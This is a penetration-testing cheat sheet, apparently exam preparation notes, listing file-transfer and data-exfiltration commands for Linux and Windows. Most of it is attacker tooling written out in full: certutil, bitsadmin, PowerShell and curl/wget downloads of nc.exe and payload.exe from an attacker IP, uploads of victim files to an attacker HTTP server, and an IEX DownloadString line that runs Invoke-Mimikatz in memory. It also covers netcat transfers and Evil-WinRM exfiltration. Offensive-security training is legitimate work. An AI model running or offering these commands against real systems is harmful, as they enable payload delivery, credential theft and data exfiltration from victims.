File Transfers

Linux (Always transfer to /tmp folder)

1. Curl: curl -O /tmp/ http://<IP>/netcat

2. Wget: wget http://<IP>:<port>/netcat

3. SSH File Transfer: scp -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -P <PORT> student@<IP>:/challenge/xyz.zip .

4. Netcat: nc -nlvp 4444 > incoming.exe (Windows)

5. Netcat: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe (Linux)

Linux (Data Exfiltration -> From Victim to Attacking Machine)

1. Refer here first, Clone the repository first and Change the paths below On Attacker: python3 SimpleHTTPServerWithUpload.py On Victim: curl -F 'file=@/opt/backup/testfile.zip' http://<IP>:8000/

2. Netcat method (Google it)

3. SCP through SSH (Google it)

Transferring Files from Linux to Windows (post-exploitation)ropnop blog

Windows (Always transfer to \windows\temp folder)

1. Method 1: certutil -urlcache -split -f 'http://<IP>/file.exe' file.exe

2. Method 2: certutil -urlcache -split -f http://<IP>/file.exe file.exe

3. Method 3 (Transfer directly to temp destination): certutil -urlcache -split -f http://<IP>:80/nc.exe C:\windows\temp\nc.exe

4. Powershell method: powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>:443/sh.exe', 'sh.exe')"

5. Curl Method: curl.exe http://<IP>:80/file.exe -o file.exe

6. Curl Method 2: curl.exe <IP>/nc.exe -o nc.exe

7. Powershell method 2: iwr -uri http://<IP>/file.exe -Outfile file.exe

8. Learn the impacket smbshare method and tftp method too from the below article - It helps!

Windows (Data Exfiltration -> From Victim to Attacking Machine)

1. My go-to method is: Refer here On Attacker: python3 SimpleHTTPServerWithUpload.py On Victim: Change the path of the file to be transferred powershell.exe -c "(New-Object System.Net.WebClient).UploadFile('http://<IP>:8000/', 'C:\windows.old\Windows\System32\system')" OR On Victim: Change the path of the file to be transferred curl -F 'file=@/opt/backup/file.zip' http://<IP>:8000/

2. 0xdf Method is also nice: Refer here

3. MOST IMPORTANT: Learn how to exfil data using Evil-winrm with the download feature, it will come in very handy and is one of the most important parts of the exam, refer here. download <File to be exfiltrated location> <Local location where it should be exfiltrated>

Command & Description - Comes Handy!

Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Download a file with PowerShell

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Execute a file in memory using PowerShell

Invoke-WebRequest -Uri [http://10.10.10.32:443](http://10.10.10.32:443/) -Method POST -Body $b64

Upload a file with PowerShell

bitsadmin /transfer n http://10.10.10.32/nc.exe C:Tempnc.exe

Download a file using Bitsadmin

certutil.exe -f [http://192.168.49.89:80/payload.exe](http://192.168.49.89/payload.exe) payload.exe

Download a file using Certutil

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Download a file using Wget

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Download a file using cURL

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("[LinEnum.sh](http://linenum.sh/)",$file);'

Download a file using PHP

scp C:Tempbloodhound.zip [user@10.10.10.150](mailto:user@10.10.10.150):/tmp/bloodhound.zip

Upload a file using SCP

scp user@target:/tmp/mimikatz.exe C:Tempmimikatz.exe

Download a file using SCP

Invoke-WebRequest [http://nc.exe](http://nc.exe/) -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Invoke-WebRequest using a Chrome User Agent

Windows File Transfers For Hackers - Juggernaut PentestingJuggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.